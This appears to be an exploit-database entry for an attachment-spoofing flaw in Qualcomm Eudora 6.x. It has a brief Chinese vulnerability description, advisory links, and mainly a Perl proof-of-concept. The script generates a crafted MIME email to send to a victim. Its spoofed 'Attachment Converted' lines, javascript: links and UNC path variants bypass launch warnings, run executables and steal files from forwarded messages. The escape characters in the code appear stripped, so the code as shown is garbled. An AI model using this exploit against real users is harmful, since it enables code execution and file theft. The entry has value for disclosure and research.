https://www.exploit-db.com/exploits/163
https://www.securityfocus.com/bid/90472
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-600

Eudora6.2.0.14版本在用户转送包含基于64位或引用可打印编码附件的邮件信息时不能发布警告。远程攻击者可以借助”Converted”头文件轻松读取任意文件。

#!/usr/bin/perl --

use MIME::Base64;

print "From: men";
print "To: youn";
print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtectn";
print "MIME-Version: 1.0n";
print "Content-Type: multipart/mixed; boundary="zzz"n";
print "n";
print "This is a multi-part message in MIME format.n";
print "--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";

print "Pipe the output of this script into:   sendmail -i victimn";

print "nWith spoofed attachments, we could 'steal' files if the 
message
was forwarded (not replied to).n";

print "nWithin plain-text email (or plain-text, inline MIME parts) 
embedded
CR=x0d characters get converted internally into a NUL=x00 and ignored,
so we can spoof "attachment converted" lines:n";

print "nThe following work fine (but are boring and/or put up 
warnings):n";
print "Attachment Convertedr: "c:\winnt\system32\calc.exe"n";
print "Attachment Convertedr: c:\winnt\system32\calc.exen";
print "(Note how JavaScript is done with IE, web with default browser 
Netscape)n";
print "Attachment Convertedr: <A 
href=javascript:alert(%27hello%27)>hello.txt</a>n";
print "Attachment Convertedr: <A 
href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>n";
print "Attachment Convertedr: <A 
href=c:/winnt/system32/calc.exe>file.txt</a>n";

print "nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:n";
print "Attachment Convertedr: <A 
href=H:/eudora/attach/calc>file.txt</a>n";

print "nCuteness value only:n";
print "Attachment Convertedr: <A 
href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>n";

print "n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a 
href="http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx">http</a>
and
<a href="javascript:alert(x27hellox27)">javascript</a>
references. Any way to exploit this?
</x-html>n";

print "n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>n";

print "nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:nn";
print "HTMLn";
print "<x-html></x-html>Attachment Converted: "xyz"n";
print "Richn";
print "<x-rich></x-rich>Attachment Converted: "xyz"n";
print "Flowedn";
print "<x-flowed></x-flowed>Attachment Converted: "xyz"n";

print "n";

print "n--zzzn";
print "Content-Type: text/plain; name="plain.txt"n";
print "Content-Transfer-Encoding: 7bitn";
print "Content-Disposition: inline; filename="plain.txt"n";
print "n";
print "Within a 'plain' attachment:n";
print "Attachment Convertedr: "c:\winnt\system32\calc.exe"n";

print "n--zzzn";
print "Content-Type: text/plain; name="qp.txt"n";
print "Content-Transfer-Encoding: quoted-printable n";
print "Content-Disposition: inline; filename="qp.txt"n";
print "n";
print "Within quoted-printable encoded parts still need the embedded 
CR:n";
print "=41ttachment=20=43onvertedr=3a 
"c:\winnt\system32\calc.exe"n";

print "n--zzzn";
print "Content-Type: text/plain; name="b64.txt"n";
print "Content-Transfer-Encoding: base64n";
print "Content-Disposition: inline; filename="b64.txt"n";
print "n";
$z = "Within base64 encoded (plain-text, inline) MIME parts, can 
spoofr
without embedded CR (but line termination is CR-NL):r
Attachment Converted: "c:\winnt\system32\calc.exe"rn";
print encode_base64($z);

print "n--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";

print "n=====n";

$X = 'README'; $Y = "$X.bat";
print "nThe X - X.exe dichotomy: send a plain $X attachment:n";
$z = "rem Funny jokernpausern";
print "begin 600 $Xn", pack('u',$z), "`nendn";
print "nand (in another message or) after some blurb so is scrolled 
off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LauchProtect warning):n";
$z = "rem Big jokernrem Should do something nastyrnpausern";
print "begin 600 $Yn", pack('u',$z), "`nendn";

print "n=====n";

print "
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an 
executable
stored elsewhere to run without warning:n";
print "Attachment Convertedr: <a 
href=c:/winnt/system32/calc>go.txt</a>n";
print "Attachment Convertedr: c:/winnt/system32/calcn";

print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\rome\home are the same thing, but Eudora does not know 
that.n";
print "These elicit warnings:n";
print "Attachment Convertedr: <a 
href=h:/eudora/attach/README>readme.txt</a>n";
print "Attachment Convertedr: h:/eudora/attach/READMEn";
print "Attachment Convertedr: \READMEn";
print "Attachment Convertedr: .\READMEn";
print "Attachment Convertedr: \.\READMEn";
print "Attachment Convertedr: ?\READMEn";
print "Attachment Convertedr: \?\READMEn";
print "while these do the bad thing without warning:n";
print "Attachment Convertedr: <a 
href=file://rome/home/eudora/attach/README>readme</a>n";
print "Attachment Convertedr: //rome/home/eudora/attach/READMEn";
print "Attachment Convertedr: 
\\rome\home\eudora\attach\READMEn";

print "
For the default setup, Eudora knows that C:\Program Files
and C:\Progra~1 are the same thing:n";
print "Attachment Convertedr: "c:/program 
files/qualcomm/eudora/attach/README"n";
print "Attachment Convertedr: 
"c:/progra~1/qualcomm/eudora/attach/README"n";
print "
and also knows that various UNC references:
\\localhost\c...
\\127.0.0.1\c...
\\BIOSNAME\c...
\\DNSNAME\c...
\\IP\c...
\\\?\c...
\\c...
...c:\progr...
...c\progr...
...c:progr...
...program files\...
...progra~1\...
or even
.\NoSuchDir\..\README
//c|\Program Files\qualcomm\eudora\attach\README
\\c|\Program Files\qualcomm\eudora\attach\README
res://c:\Program Files\qualcomm\eudora\attach\README
res:\\c:\Program Files\qualcomm\eudora\attach\README
shell:Fonts\..\..\Program Files\qualcomm\eudora\attach\README
%ProgramFiles%\qualcomm\eudora\attach\README
%windir%\..\Program Files\qualcomm\eudora\attach\README
are all the same thing...
";

print "n";
print "n--zzz--n";
print "n";

# milw0rm.com [2004-03-19]

Qualcomm Eudora 6.2.0.14

来源:XF
名称:eudora-base64-attach-spoof-variant(18064)
链接:http://xforce.iss.net/xforce/xfdb/18064
来源:packetstormsecurity.nl
链接:http://packetstormsecurity.nl/0411-exploits/eudora62014.txt
来源:NTBUGTRAQ
名称:20041113Eudora6.2attachmentspoof
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=110053102601655&w;=2
来源:BUGTRAQ
名称:20041113Eudora6.2attachmentspoof
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110037078519691&w;=2